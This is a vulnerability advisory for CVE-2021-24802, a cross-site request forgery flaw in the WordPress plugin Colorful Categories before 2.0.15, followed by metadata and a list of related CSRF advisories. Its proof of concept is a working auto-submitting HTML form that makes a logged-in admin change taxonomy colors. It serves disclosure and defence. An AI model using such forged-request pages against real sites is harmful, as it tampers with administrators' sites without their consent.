Colorful Categories < 2.0.15 – Arbitrary Colors Update via CSRF | CVE 2021-24802 | Plugin Vulnerabilities

Description

The plugin does not enforce nonce checks which could allow attackers to make a logged in admin or editor change taxonomy colors via a CSRF attack

Proof of Concept

<form action="https://example.com/wp-admin/admin-ajax.php" method="post" id="csrf">
<input type="hidden" name="action" value="update_color_options_array">
<input type="hidden" name="termId" value="1">
<input type="hidden" name="taxonomy" value="category">
<input type="hidden" name="color" value="#FF0000">
</form><script>csrf.submit()</script>

Affects Plugins

colorful-categories

Fixed in 2.0.15

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

d92db61f-341c-4f3f-b962-326194ddbd1e

Timeline

Publicly Published

2021-10-13 (about 4 years ago)

Added

2021-10-13 (about 4 years ago)

Last Updated

2022-04-11 (about 3 years ago)

Other

Published

Title

Published

2025-03-27

Title

Custom Field For WP Job Manager < 1.5 - Cross-Site Request Forgery

Published

2016-12-09

Title

Multisite Post Duplicator < 1.1.3 - Cross-Site Request Forgery (CSRF)

Published

2022-11-10

Title

WP OAuth Server < 3.4.2 - Client Secret Regeneration via CSRF

Published

2022-10-31

Title

Content Egg < 5.5.0 - Multiple CSRF

Published

2025-03-11

Title

No Disposable Email <= 2.5.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting